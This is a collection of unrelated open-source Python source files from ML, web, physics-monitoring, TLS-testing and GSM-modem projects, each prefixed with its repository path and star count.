class UserDeleteSerializer(Serializer):
# most of this is actually redundant, i don't need to have a validation step, but i do this
# out of paranoia reasons that someone may delete their account by mistake
password = CharField()
user = HiddenField(default=CurrentUserDefault())
uuid = UUIDField()
def validate(self, data):
user = data["user"]
validated_password = check_password(data["password"], user.password)
if not validated_password:
raise ValidationError("Invalid Password Entered")
validated_uuid = str(user.uuid) == str(data["uuid"])
if not validated_uuid:
raise ValidationError("Invalid UUID", str(user.uuid))
validate_user = user.username != "<EMAIL>"
if not validate_user:
raise ValidationError(
f"This is a protected user and cannot be deleted. {user.username}"
)
return data
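# A minimal usage sketch, assuming Django settings are configured before the
# serializers are imported (field values below are placeholders):
#
#     serializer = UserCreateSerializer(data={
#         "username": "demo-user",
#         "password": "a-strong-password",
#         "timezone_string": "US/Eastern",
#     })
#     serializer.is_valid(raise_exception=True)
#     user = serializer.save()  # dispatches to create() above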
|
speech/melgan/model/multiscale.py | OthmaneJ/deep-tts | 213 | 8784 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .discriminator import Discriminator
from .identity import Identity
class MultiScaleDiscriminator(nn.Module):
def __init__(self):
super(MultiScaleDiscriminator, self).__init__()
self.discriminators = nn.ModuleList(
[Discriminator() for _ in range(3)]
)
self.pooling = nn.ModuleList(
[Identity()] +
[nn.AvgPool1d(kernel_size=4, stride=2, padding=2) for _ in range(1, 3)]
)
def forward(self, x):
ret = list()
for pool, disc in zip(self.pooling, self.discriminators):
x = pool(x)
ret.append(disc(x))
return ret # [(feat, score), (feat, score), (feat, score)]
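# A minimal usage sketch, assuming Discriminator consumes raw waveforms shaped
# (batch, 1, time) as in MelGAN (the exact input contract lives in
# discriminator.py):
#
#     disc = MultiScaleDiscriminator()
#     outputs = disc(torch.randn(2, 1, 16384))
#     for features, score in outputs:  # one (feat, score) pair per resolution
#         print(score.shape)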
|
allennlp/training/metric_tracker.py | MSLars/allennlp | 11,433 | 8791 | from typing import Optional, Dict, Any, List, Union
from allennlp.common.checks import ConfigurationError
class MetricTracker:
"""
This class tracks a metric during training for the dual purposes of early stopping
and for knowing whether the current value is the best so far. It mimics the PyTorch
`state_dict` / `load_state_dict` interface, so that it can be checkpointed along with
your model and optimizer.
Some metrics improve by increasing; others by decreasing. You can provide a
`metric_name` that starts with "+" to indicate an increasing metric, or "-"
to indicate a decreasing metric.
# Parameters
metric_name : `Union[str, List[str]]`
Specifies the metric or metrics to track. Metric names have to start with
"+" for increasing metrics or "-" for decreasing ones. If you specify more
        than one, it tracks the sum of the increasing metrics minus the sum
of the decreasing metrics.
patience : `int`, optional (default = `None`)
If provided, then `should_stop_early()` returns True if we go this
many epochs without seeing a new best value.
"""
def __init__(
self,
metric_name: Union[str, List[str]],
patience: Optional[int] = None,
) -> None:
self._patience = patience
self._best_so_far: Optional[float] = None
self._epochs_with_no_improvement = 0
self._is_best_so_far = True
self._epoch_number = 0
self.best_epoch: Optional[int] = None
self.best_epoch_metrics: Dict[str, float] = {}
if isinstance(metric_name, str):
metric_name = [metric_name]
self.tracked_metrics = []
for name in metric_name:
if name.startswith("+"):
self.tracked_metrics.append((1.0, name[1:]))
elif name.startswith("-"):
self.tracked_metrics.append((-1.0, name[1:]))
else:
raise ConfigurationError("metric_name must start with + or -")
def clear(self) -> None:
"""
Clears out the tracked metrics, but keeps the patience
"""
self._best_so_far = None
self._epochs_with_no_improvement = 0
self._is_best_so_far = True
self._epoch_number = 0
self.best_epoch = None
self.best_epoch_metrics.clear()
def state_dict(self) -> Dict[str, Any]:
"""
A `Trainer` can use this to serialize the state of the metric tracker.
"""
return {
"best_so_far": self._best_so_far,
"epochs_with_no_improvement": self._epochs_with_no_improvement,
"is_best_so_far": self._is_best_so_far,
"epoch_number": self._epoch_number,
"best_epoch": self.best_epoch,
"best_epoch_metrics": self.best_epoch_metrics,
}
def load_state_dict(self, state_dict: Dict[str, Any]) -> None:
"""
A `Trainer` can use this to hydrate a metric tracker from a serialized state.
"""
self._best_so_far = state_dict["best_so_far"]
self._epochs_with_no_improvement = state_dict["epochs_with_no_improvement"]
self._is_best_so_far = state_dict["is_best_so_far"]
self._epoch_number = state_dict["epoch_number"]
self.best_epoch = state_dict["best_epoch"]
# Even though we don't promise backwards compatibility for the --recover flag,
# it's particularly easy and harmless to provide it here, so we do it.
self.best_epoch_metrics = state_dict.get("best_epoch_metrics", {})
def add_metrics(self, metrics: Dict[str, float]) -> None:
"""
Record a new value of the metric and update the various things that depend on it.
"""
combined_score = self.combined_score(metrics)
new_best = (self._best_so_far is None) or (combined_score > self._best_so_far)
if new_best:
self._best_so_far = combined_score
self._epochs_with_no_improvement = 0
self._is_best_so_far = True
self.best_epoch = self._epoch_number
else:
self._epochs_with_no_improvement += 1
self._is_best_so_far = False
self._epoch_number += 1
def is_best_so_far(self) -> bool:
"""
Returns true if the most recent value of the metric is the best so far.
"""
return self._is_best_so_far
def should_stop_early(self) -> bool:
"""
Returns true if improvement has stopped for long enough.
"""
if self._patience is None:
return False
else:
return self._epochs_with_no_improvement >= self._patience
def combined_score(self, metrics: Dict[str, float]) -> float:
try:
return sum(
factor * metrics[metric_name] for factor, metric_name in self.tracked_metrics
)
except KeyError as e:
raise ConfigurationError(
f"You configured the trainer to use the {e.args[0]} "
"metric for early stopping, but the model did not produce that metric."
)
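# A minimal usage sketch with made-up metric values: the combined score is
# accuracy minus loss, and patience=2 triggers early stopping after two epochs
# without improvement.
if __name__ == "__main__":
    tracker = MetricTracker(metric_name=["+accuracy", "-loss"], patience=2)
    for epoch_metrics in [
        {"accuracy": 0.70, "loss": 0.90},
        {"accuracy": 0.75, "loss": 0.80},  # new best combined score
        {"accuracy": 0.74, "loss": 0.85},
        {"accuracy": 0.73, "loss": 0.88},
    ]:
        tracker.add_metrics(epoch_metrics)
        print(tracker.is_best_so_far(), tracker.should_stop_early())
    # prints: True False / True False / False False / False True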
|
DQM/L1TMonitor/python/L1TGCT_cfi.py | ckamtsikis/cmssw | 852 | 8798 | import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
l1tGct = DQMEDAnalyzer('L1TGCT',
gctCentralJetsSource = cms.InputTag("gctDigis","cenJets"),
gctForwardJetsSource = cms.InputTag("gctDigis","forJets"),
gctTauJetsSource = cms.InputTag("gctDigis","tauJets"),
gctIsoTauJetsSource = cms.InputTag("gctDigis","fake"),
gctEnergySumsSource = cms.InputTag("gctDigis"),
gctIsoEmSource = cms.InputTag("gctDigis","isoEm"),
gctNonIsoEmSource = cms.InputTag("gctDigis","nonIsoEm"),
monitorDir = cms.untracked.string("L1T/L1TGCT"),
verbose = cms.untracked.bool(False),
stage1_layer2_ = cms.bool(False),
DQMStore = cms.untracked.bool(True),
disableROOToutput = cms.untracked.bool(True),
filterTriggerType = cms.int32(1)
)
|
tests/integration/lambdas/lambda_python3.py | jorges119/localstack | 31,928 | 8806 | <reponame>jorges119/localstack
# simple test function that uses python 3 features (e.g., f-strings)
# see https://github.com/localstack/localstack/issues/264
def handler(event, context):
# the following line is Python 3.6+ specific
msg = f"Successfully processed {event}" # noqa This code is Python 3.6+ only
return event
|
test/modules/md/md_env.py | icing/mod_md | 320 | 8810 | import copy
import inspect
import json
import logging
import pytest
import re
import os
import shutil
import subprocess
import time
from datetime import datetime, timedelta
from configparser import ConfigParser, ExtendedInterpolation
from typing import Dict, List, Optional
from pyhttpd.certs import CertificateSpec
from .md_cert_util import MDCertUtil
from pyhttpd.env import HttpdTestSetup, HttpdTestEnv
from pyhttpd.result import ExecResult
log = logging.getLogger(__name__)
class MDTestSetup(HttpdTestSetup):
def __init__(self, env: 'HttpdTestEnv'):
super().__init__(env=env)
def make(self):
super().make(add_modules=["proxy_connect", "md"])
if "pebble" == self.env.acme_server:
self._make_pebble_conf()
def _make_pebble_conf(self):
our_dir = os.path.dirname(inspect.getfile(MDTestSetup))
conf_src_dir = os.path.join(our_dir, 'pebble')
conf_dest_dir = os.path.join(self.env.gen_dir, 'pebble')
if not os.path.exists(conf_dest_dir):
os.makedirs(conf_dest_dir)
for name in os.listdir(conf_src_dir):
src_path = os.path.join(conf_src_dir, name)
m = re.match(r'(.+).template', name)
if m:
self._make_template(src_path, os.path.join(conf_dest_dir, m.group(1)))
elif os.path.isfile(src_path):
shutil.copy(src_path, os.path.join(conf_dest_dir, name))
class MDTestEnv(HttpdTestEnv):
MD_S_UNKNOWN = 0
MD_S_INCOMPLETE = 1
MD_S_COMPLETE = 2
MD_S_EXPIRED = 3
MD_S_ERROR = 4
EMPTY_JOUT = {'status': 0, 'output': []}
DOMAIN_SUFFIX = "%d.org" % time.time()
LOG_FMT_TIGHT = '%(levelname)s: %(message)s'
@classmethod
def get_acme_server(cls):
return os.environ['ACME'] if 'ACME' in os.environ else "pebble"
@classmethod
def has_acme_server(cls):
return cls.get_acme_server() != 'none'
@classmethod
def has_acme_eab(cls):
return cls.get_acme_server() == 'pebble'
@classmethod
def is_pebble(cls) -> bool:
return cls.get_acme_server() == 'pebble'
@classmethod
def lacks_ocsp(cls):
return cls.is_pebble()
def __init__(self, pytestconfig=None, setup_dirs=True):
super().__init__(pytestconfig=pytestconfig,
local_dir=os.path.dirname(inspect.getfile(MDTestEnv)),
interesting_modules=["md"])
self._acme_server = self.get_acme_server()
self._acme_tos = "accepted"
self._acme_ca_pemfile = os.path.join(self.gen_dir, "apache/acme-ca.pem")
if "pebble" == self._acme_server:
self._acme_url = "https://localhost:14000/dir"
self._acme_eab_url = "https://localhost:14001/dir"
elif "boulder" == self._acme_server:
self._acme_url = "http://localhost:4001/directory"
self._acme_eab_url = None
else:
raise Exception(f"unknown ACME server type: {self._acme_server}")
self._acme_server_down = False
self._acme_server_ok = False
self._a2md_bin = os.path.join(self.bin_dir, 'a2md')
self._default_domain = f"test1.{self.http_tld}"
self._store_dir = "./md"
self.set_store_dir_default()
self.add_cert_specs([
CertificateSpec(domains=[f"expired.{self._http_tld}"],
valid_from=timedelta(days=-100),
valid_to=timedelta(days=-10)),
CertificateSpec(domains=["localhost"], key_type='rsa2048'),
])
self.httpd_error_log.set_ignored_lognos([
#"AH10045", # mod_md complains that there is no vhost for an MDomain
"AH10105", # mod_md does not find a vhost with SSL enabled for an MDomain
"AH10085" # mod_ssl complains about fallback certificates
])
if self.lacks_ocsp():
self.httpd_error_log.set_ignored_patterns([
re.compile(r'.*certificate with serial \S+ has no OCSP responder URL.*'),
])
if setup_dirs:
self._setup = MDTestSetup(env=self)
self._setup.make()
self.issue_certs()
self.clear_store()
def set_store_dir_default(self):
dirpath = "md"
if self.httpd_is_at_least("2.5.0"):
dirpath = os.path.join("state", dirpath)
self.set_store_dir(dirpath)
def set_store_dir(self, dirpath):
self._store_dir = os.path.join(self.server_dir, dirpath)
if self.acme_url:
self.a2md_stdargs([self.a2md_bin, "-a", self.acme_url, "-d", self._store_dir, "-C", self.acme_ca_pemfile, "-j"])
self.a2md_rawargs([self.a2md_bin, "-a", self.acme_url, "-d", self._store_dir, "-C", self.acme_ca_pemfile])
def get_apxs_var(self, name: str) -> str:
p = subprocess.run([self._apxs, "-q", name], capture_output=True, text=True)
if p.returncode != 0:
return ""
return p.stdout.strip()
@property
def acme_server(self):
return self._acme_server
@property
def acme_url(self):
return self._acme_url
@property
def acme_tos(self):
return self._acme_tos
@property
def a2md_bin(self):
return self._a2md_bin
@property
def acme_ca_pemfile(self):
return self._acme_ca_pemfile
@property
def store_dir(self):
return self._store_dir
def get_request_domain(self, request):
return "%s-%s" % (re.sub(r'[_]', '-', request.node.originalname), MDTestEnv.DOMAIN_SUFFIX)
def get_method_domain(self, method):
return "%s-%s" % (re.sub(r'[_]', '-', method.__name__.lower()), MDTestEnv.DOMAIN_SUFFIX)
def get_module_domain(self, module):
return "%s-%s" % (re.sub(r'[_]', '-', module.__name__.lower()), MDTestEnv.DOMAIN_SUFFIX)
def get_class_domain(self, c):
return "%s-%s" % (re.sub(r'[_]', '-', c.__name__.lower()), MDTestEnv.DOMAIN_SUFFIX)
# --------- cmd execution ---------
_a2md_args = []
_a2md_args_raw = []
def a2md_stdargs(self, args):
self._a2md_args = [] + args
def a2md_rawargs(self, args):
self._a2md_args_raw = [] + args
def a2md(self, args, raw=False) -> ExecResult:
preargs = self._a2md_args
if raw:
preargs = self._a2md_args_raw
log.debug("running: {0} {1}".format(preargs, args))
return self.run(preargs + args)
def check_acme(self):
if self._acme_server_ok:
return True
if self._acme_server_down:
pytest.skip(msg="ACME server not running")
return False
if self.is_live(self.acme_url, timeout=timedelta(seconds=0.5)):
self._acme_server_ok = True
return True
else:
self._acme_server_down = True
pytest.fail(msg="ACME server not running", pytrace=False)
return False
def get_ca_pem_file(self, hostname: str) -> Optional[str]:
pem_file = super().get_ca_pem_file(hostname)
if pem_file is None:
pem_file = self.acme_ca_pemfile
return pem_file
# --------- access local store ---------
def purge_store(self):
log.debug("purge store dir: %s" % self._store_dir)
assert len(self._store_dir) > 1
if os.path.exists(self._store_dir):
shutil.rmtree(self._store_dir, ignore_errors=False)
os.makedirs(self._store_dir)
def clear_store(self):
log.debug("clear store dir: %s" % self._store_dir)
assert len(self._store_dir) > 1
if not os.path.exists(self._store_dir):
os.makedirs(self._store_dir)
for dirpath in ["challenges", "tmp", "archive", "domains", "accounts", "staging", "ocsp"]:
shutil.rmtree(os.path.join(self._store_dir, dirpath), ignore_errors=True)
def clear_ocsp_store(self):
assert len(self._store_dir) > 1
dirpath = os.path.join(self._store_dir, "ocsp")
        log.debug("clear ocsp store dir: %s" % dirpath)
if os.path.exists(dirpath):
shutil.rmtree(dirpath, ignore_errors=True)
def authz_save(self, name, content):
dirpath = os.path.join(self._store_dir, 'staging', name)
os.makedirs(dirpath)
open(os.path.join(dirpath, 'authz.json'), "w").write(content)
def path_store_json(self):
return os.path.join(self._store_dir, 'md_store.json')
def path_account(self, acct):
return os.path.join(self._store_dir, 'accounts', acct, 'account.json')
def path_account_key(self, acct):
return os.path.join(self._store_dir, 'accounts', acct, 'account.pem')
def store_domains(self):
return os.path.join(self._store_dir, 'domains')
def store_archives(self):
return os.path.join(self._store_dir, 'archive')
def store_stagings(self):
return os.path.join(self._store_dir, 'staging')
def store_challenges(self):
return os.path.join(self._store_dir, 'challenges')
def store_domain_file(self, domain, filename):
return os.path.join(self.store_domains(), domain, filename)
def store_archived_file(self, domain, version, filename):
return os.path.join(self.store_archives(), "%s.%d" % (domain, version), filename)
def store_staged_file(self, domain, filename):
return os.path.join(self.store_stagings(), domain, filename)
def path_fallback_cert(self, domain):
return os.path.join(self._store_dir, 'domains', domain, 'fallback-pubcert.pem')
def path_job(self, domain):
return os.path.join(self._store_dir, 'staging', domain, 'job.json')
def replace_store(self, src):
shutil.rmtree(self._store_dir, ignore_errors=False)
shutil.copytree(src, self._store_dir)
def list_accounts(self):
return os.listdir(os.path.join(self._store_dir, 'accounts'))
def check_md(self, domain, md=None, state=-1, ca=None, protocol=None, agreement=None, contacts=None):
domains = None
if isinstance(domain, list):
domains = domain
domain = domains[0]
if md:
domain = md
path = self.store_domain_file(domain, 'md.json')
with open(path) as f:
md = json.load(f)
assert md
if domains:
assert md['domains'] == domains
if state >= 0:
assert md['state'] == state
if ca:
assert md['ca']['url'] == ca
if protocol:
assert md['ca']['proto'] == protocol
if agreement:
assert md['ca']['agreement'] == agreement
if contacts:
assert md['contacts'] == contacts
def pkey_fname(self, pkeyspec=None):
if pkeyspec and not re.match(r'^rsa( ?\d+)?$', pkeyspec.lower()):
return "privkey.{0}.pem".format(pkeyspec)
return 'privkey.pem'
def cert_fname(self, pkeyspec=None):
if pkeyspec and not re.match(r'^rsa( ?\d+)?$', pkeyspec.lower()):
return "pubcert.{0}.pem".format(pkeyspec)
return 'pubcert.pem'
def check_md_complete(self, domain, pkey=None):
md = self.get_md_status(domain)
assert md
assert 'state' in md, "md is unexpected: {0}".format(md)
assert md['state'] is MDTestEnv.MD_S_COMPLETE, "unexpected state: {0}".format(md['state'])
assert os.path.isfile(self.store_domain_file(domain, self.pkey_fname(pkey)))
assert os.path.isfile(self.store_domain_file(domain, self.cert_fname(pkey)))
def check_md_credentials(self, domain):
if isinstance(domain, list):
domains = domain
domain = domains[0]
else:
domains = [domain]
# check private key, validate certificate, etc
MDCertUtil.validate_privkey(self.store_domain_file(domain, 'privkey.pem'))
cert = MDCertUtil(self.store_domain_file(domain, 'pubcert.pem'))
cert.validate_cert_matches_priv_key(self.store_domain_file(domain, 'privkey.pem'))
# check SANs and CN
assert cert.get_cn() == domain
# compare lists twice in opposite directions: SAN may not respect ordering
san_list = list(cert.get_san_list())
assert len(san_list) == len(domains)
assert set(san_list).issubset(domains)
assert set(domains).issubset(san_list)
# check valid dates interval
not_before = cert.get_not_before()
not_after = cert.get_not_after()
assert not_before < datetime.now(not_before.tzinfo)
assert not_after > datetime.now(not_after.tzinfo)
# --------- check utilities ---------
def check_json_contains(self, actual, expected):
# write all expected key:value bindings to a copy of the actual data ...
# ... assert it stays unchanged
test_json = copy.deepcopy(actual)
test_json.update(expected)
assert actual == test_json
def check_file_access(self, path, exp_mask):
actual_mask = os.lstat(path).st_mode & 0o777
assert oct(actual_mask) == oct(exp_mask)
def check_dir_empty(self, path):
assert os.listdir(path) == []
def get_http_status(self, domain, path, use_https=True):
r = self.get_meta(domain, path, use_https, insecure=True)
return r.response['status']
def get_cert(self, domain, tls=None, ciphers=None):
return MDCertUtil.load_server_cert(self._httpd_addr, self.https_port,
domain, tls=tls, ciphers=ciphers)
def get_server_cert(self, domain, proto=None, ciphers=None):
args = [
"openssl", "s_client", "-status",
"-connect", "%s:%s" % (self._httpd_addr, self.https_port),
"-CAfile", self.acme_ca_pemfile,
"-servername", domain,
"-showcerts"
]
if proto is not None:
args.extend(["-{0}".format(proto)])
if ciphers is not None:
args.extend(["-cipher", ciphers])
r = self.run(args)
# noinspection PyBroadException
try:
return MDCertUtil.parse_pem_cert(r.stdout)
except:
return None
def verify_cert_key_lenghts(self, domain, pkeys):
for p in pkeys:
cert = self.get_server_cert(domain, proto="tls1_2", ciphers=p['ciphers'])
if 0 == p['keylen']:
assert cert is None
else:
assert cert, "no cert returned for cipher: {0}".format(p['ciphers'])
assert cert.get_key_length() == p['keylen'], "key length, expected {0}, got {1}".format(
p['keylen'], cert.get_key_length()
)
def get_meta(self, domain, path, use_https=True, insecure=False):
schema = "https" if use_https else "http"
port = self.https_port if use_https else self.http_port
r = self.curl_get(f"{schema}://{domain}:{port}{path}", insecure=insecure)
assert r.exit_code == 0
assert r.response
assert r.response['header']
return r
def get_content(self, domain, path, use_https=True):
schema = "https" if use_https else "http"
port = self.https_port if use_https else self.http_port
r = self.curl_get(f"{schema}://{domain}:{port}{path}")
assert r.exit_code == 0
return r.stdout
def get_json_content(self, domain, path, use_https=True, insecure=False,
debug_log=True):
schema = "https" if use_https else "http"
port = self.https_port if use_https else self.http_port
url = f"{schema}://{domain}:{port}{path}"
r = self.curl_get(url, insecure=insecure, debug_log=debug_log)
if r.exit_code != 0:
log.error(f"curl get on {url} returned {r.exit_code}"
f"\nstdout: {r.stdout}"
f"\nstderr: {r.stderr}")
assert r.exit_code == 0, r.stderr
return r.json
def get_certificate_status(self, domain) -> Dict:
return self.get_json_content(domain, "/.httpd/certificate-status", insecure=True)
def get_md_status(self, domain, via_domain=None, use_https=True, debug_log=False) -> Dict:
if via_domain is None:
via_domain = self._default_domain
return self.get_json_content(via_domain, f"/md-status/{domain}",
use_https=use_https, debug_log=debug_log)
def get_server_status(self, query="/", via_domain=None, use_https=True):
if via_domain is None:
via_domain = self._default_domain
return self.get_content(via_domain, "/server-status%s" % query, use_https=use_https)
def await_completion(self, names, must_renew=False, restart=True, timeout=60,
via_domain=None, use_https=True):
try_until = time.time() + timeout
renewals = {}
names = names.copy()
while len(names) > 0:
if time.time() >= try_until:
return False
for name in names:
mds = self.get_md_status(name, via_domain=via_domain, use_https=use_https)
if mds is None:
log.debug("not managed by md: %s" % name)
return False
if 'renewal' in mds:
renewal = mds['renewal']
renewals[name] = True
if 'finished' in renewal and renewal['finished'] is True:
if (not must_renew) or (name in renewals):
log.debug(f"domain cert was renewed: {name}")
names.remove(name)
if len(names) != 0:
time.sleep(0.1)
if restart:
time.sleep(0.1)
return self.apache_restart() == 0
return True
def is_renewing(self, name):
stat = self.get_certificate_status(name)
return 'renewal' in stat
def await_renewal(self, names, timeout=60):
try_until = time.time() + timeout
while len(names) > 0:
if time.time() >= try_until:
return False
for name in names:
md = self.get_md_status(name)
if md is None:
log.debug("not managed by md: %s" % name)
return False
if 'renewal' in md:
names.remove(name)
if len(names) != 0:
time.sleep(0.1)
return True
def await_error(self, domain, timeout=60, via_domain=None, use_https=True, errors=1):
try_until = time.time() + timeout
while True:
if time.time() >= try_until:
return False
md = self.get_md_status(domain, via_domain=via_domain, use_https=use_https)
if md:
if 'state' in md and md['state'] == MDTestEnv.MD_S_ERROR:
return md
if 'renewal' in md and 'errors' in md['renewal'] \
and md['renewal']['errors'] >= errors:
return md
time.sleep(0.1)
return None
def await_file(self, fpath, timeout=60):
try_until = time.time() + timeout
while True:
if time.time() >= try_until:
return False
if os.path.isfile(fpath):
return True
time.sleep(0.1)
def check_file_permissions(self, domain):
md = self.a2md(["list", domain]).json['output'][0]
assert md
acct = md['ca']['account']
assert acct
self.check_file_access(self.path_store_json(), 0o600)
# domains
self.check_file_access(self.store_domains(), 0o700)
self.check_file_access(os.path.join(self.store_domains(), domain), 0o700)
self.check_file_access(self.store_domain_file(domain, 'privkey.pem'), 0o600)
self.check_file_access(self.store_domain_file(domain, 'pubcert.pem'), 0o600)
self.check_file_access(self.store_domain_file(domain, 'md.json'), 0o600)
# archive
self.check_file_access(self.store_archived_file(domain, 1, 'md.json'), 0o600)
# accounts
self.check_file_access(os.path.join(self._store_dir, 'accounts'), 0o755)
self.check_file_access(os.path.join(self._store_dir, 'accounts', acct), 0o755)
self.check_file_access(self.path_account(acct), 0o644)
self.check_file_access(self.path_account_key(acct), 0o644)
# staging
self.check_file_access(self.store_stagings(), 0o755)
def get_ocsp_status(self, domain, proto=None, cipher=None, ca_file=None):
stat = {}
args = [
"openssl", "s_client", "-status",
"-connect", "%s:%s" % (self._httpd_addr, self.https_port),
"-CAfile", ca_file if ca_file else self.acme_ca_pemfile,
"-servername", domain,
"-showcerts"
]
if proto is not None:
args.extend(["-{0}".format(proto)])
if cipher is not None:
args.extend(["-cipher", cipher])
r = self.run(args, debug_log=False)
ocsp_regex = re.compile(r'OCSP response: +([^=\n]+)\n')
matches = ocsp_regex.finditer(r.stdout)
for m in matches:
if m.group(1) != "":
stat['ocsp'] = m.group(1)
if 'ocsp' not in stat:
ocsp_regex = re.compile(r'OCSP Response Status:\s*(.+)')
matches = ocsp_regex.finditer(r.stdout)
for m in matches:
if m.group(1) != "":
stat['ocsp'] = m.group(1)
verify_regex = re.compile(r'Verify return code:\s*(.+)')
matches = verify_regex.finditer(r.stdout)
for m in matches:
if m.group(1) != "":
stat['verify'] = m.group(1)
return stat
def await_ocsp_status(self, domain, timeout=10, ca_file=None):
try_until = time.time() + timeout
while True:
if time.time() >= try_until:
break
stat = self.get_ocsp_status(domain, ca_file=ca_file)
if 'ocsp' in stat and stat['ocsp'] != "no response sent":
return stat
time.sleep(0.1)
        raise TimeoutError(f"ocsp response not available: {domain}")
def create_self_signed_cert(self, name_list, valid_days, serial=1000, path=None):
dirpath = path
if not path:
dirpath = os.path.join(self.store_domains(), name_list[0])
return MDCertUtil.create_self_signed_cert(dirpath, name_list, valid_days, serial) |
tests/performance/bottle/simple_server.py | Varriount/sanic | 4,959 | 8817 | # Run with: gunicorn --workers=1 --worker-class=meinheld.gmeinheld.MeinheldWorker -b :8000 simple_server:app
import bottle
import ujson
from bottle import route, run
@route("/")
def index():
return ujson.dumps({"test": True})
app = bottle.default_app()
|
sdk/python/lib/test/langhost/future_input/__main__.py | pcen/pulumi | 12,004 | 8827 | # Copyright 2016-2018, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
from pulumi import CustomResource, Output, Input
async def read_a_file_or_something():
await asyncio.sleep(0)
return "here's a file"
def assert_eq(l, r):
assert l == r
class FileResource(CustomResource):
contents: Output[str]
def __init__(self, name: str, file_contents: Input[str]) -> None:
CustomResource.__init__(self, "test:index:FileResource", name, {
"contents": file_contents
})
# read_a_file_or_something returns a coroutine when called, which needs to be scheduled
# and awaited in order to yield a value.
file_res = FileResource("file", read_a_file_or_something())
file_res.contents.apply(lambda c: assert_eq(c, "here's a file"))
|
AppPkg/Applications/Python/Python-2.7.2/Lib/lib2to3/fixes/fix_methodattrs.py | CEOALT1/RefindPlusUDK | 2,757 | 8833 | <reponame>CEOALT1/RefindPlusUDK<gh_stars>1000+
"""Fix bound method attributes (method.im_? -> method.__?__).
"""
# Author: <NAME>
# Local imports
from .. import fixer_base
from ..fixer_util import Name
MAP = {
"im_func" : "__func__",
"im_self" : "__self__",
"im_class" : "__self__.__class__"
}
class FixMethodattrs(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """
power< any+ trailer< '.' attr=('im_func' | 'im_self' | 'im_class') > any* >
"""
def transform(self, node, results):
attr = results["attr"][0]
new = unicode(MAP[attr.value])
attr.replace(Name(new, prefix=attr.prefix))
|
tests/test_misc.py | lordmauve/chopsticks | 171 | 8839 | """Tests for miscellaneous properties, such as debuggability."""
import time
from chopsticks.tunnel import Docker
from chopsticks.group import Group
def test_tunnel_repr():
"""Tunnels have a usable repr."""
tun = Docker('py36', image='python:3.6')
assert repr(tun) == "Docker('py36')"
def test_group_repr():
"""Groups have a usable repr."""
grp = Group([
Docker('py35', image='python:3.5'),
Docker('py36', image='python:3.6')
])
assert repr(grp) == "Group([Docker('py35'), Docker('py36')])"
def test_group_reuse():
"""We can re-use a group."""
grp = Group([
Docker('py35', image='python:3.5'),
Docker('py36', image='python:3.6')
])
with grp:
grp.call(time.time)
grp.call(time.time)
|
intro/matplotlib/examples/plot_good.py | zmoon/scipy-lecture-notes | 2,538 | 8883 | """
A simple, good-looking plot
===========================
Demoing some simple features of matplotlib
"""
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(5, 4), dpi=72)
axes = fig.add_axes([0.01, 0.01, .98, 0.98])
X = np.linspace(0, 2, 200)
Y = np.sin(2*np.pi*X)
plt.plot(X, Y, lw=2)
plt.ylim(-1.1, 1.1)
plt.grid()
plt.show()
|
src/backend/common/models/favorite.py | ofekashery/the-blue-alliance | 266 | 8901 | from backend.common.models.mytba import MyTBAModel
class Favorite(MyTBAModel):
"""
In order to make strongly consistent DB requests, instances of this class
should be created with a parent that is the associated Account key.
"""
def __init__(self, *args, **kwargs):
super(Favorite, self).__init__(*args, **kwargs)
|
modules/pygsm/devicewrapper.py | whanderley/eden | 205 | 8903 | <gh_stars>100-1000
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4 encoding=utf-8
# arch: pacman -S python-pyserial
# debian/ubuntu: apt-get install python-serial
import serial
import re
import errors
class DeviceWrapper(object):
def __init__(self, logger, *args, **kwargs):
self.device = serial.Serial(*args, **kwargs)
self.logger = logger
def isOpen(self):
return self.device.isOpen()
def close(self):
self.device.close()
def write(self, str):
self.device.write(str)
def _read(self, read_term=None, read_timeout=None):
"""Read from the modem (blocking) until _terminator_ is hit,
(defaults to \r\n, which reads a single "line"), and return."""
buffer = []
# if a different timeout was requested just
# for _this_ read, store and override the
# current device setting (not thread safe!)
if read_timeout is not None:
old_timeout = self.device.timeout
self.device.timeout = read_timeout
def __reset_timeout():
"""restore the device's previous timeout
setting, if we overrode it earlier."""
if read_timeout is not None:
self.device.timeout =\
old_timeout
# the default terminator reads
# until a newline is hit
if read_term is None:
read_term = "\r\n"
while(True):
buf = self.device.read()
buffer.append(buf)
            # if a timeout was hit, raise an exception including the raw data that
            # we've already read (in case the calling func was _expecting_ a timeout).
            # (wouldn't it be nice if serial.Serial.read returned None for this?)
if buf == '':
__reset_timeout()
raise(errors.GsmReadTimeoutError(buffer))
# if last n characters of the buffer match the read
# terminator, return what we've received so far
if ''.join(buffer[-len(read_term):]) == read_term:
buf_str = ''.join(buffer)
__reset_timeout()
self._log(repr(buf_str), 'read')
return buf_str
def read_lines(self, read_term=None, read_timeout=None):
"""Read from the modem (blocking) one line at a time until a response
terminator ("OK", "ERROR", or "CMx ERROR...") is hit, then return
a list containing the lines."""
buffer = []
# keep on looping until a command terminator
# is encountered. these are NOT the same as the
# "read_term" argument - only OK or ERROR is valid
while(True):
buf = self._read(
read_term=read_term,
read_timeout=read_timeout)
buf = buf.strip()
buffer.append(buf)
# most commands return OK for success, but there
# are some exceptions. we're not checking those
# here (unlike RubyGSM), because they should be
# handled when they're _expected_
if buf == "OK":
return buffer
# some errors contain useful error codes, so raise a
# proper error with a description from pygsm/errors.py
m = re.match(r"^\+(CM[ES]) ERROR: (\d+)$", buf)
if m is not None:
type, code = m.groups()
raise(errors.GsmModemError(type, int(code)))
# ...some errors are not so useful
# (at+cmee=1 should enable error codes)
if buf == "ERROR":
raise(errors.GsmModemError)
def _log(self, str, type="debug"):
if hasattr(self, "logger"):
self.logger(self, str, type) |
tests/cases/cls.py | div72/py2many | 345 | 8907 | <gh_stars>100-1000
class Foo:
def bar(self):
return "a"
if __name__ == "__main__":
f = Foo()
b = f.bar()
print(b) |
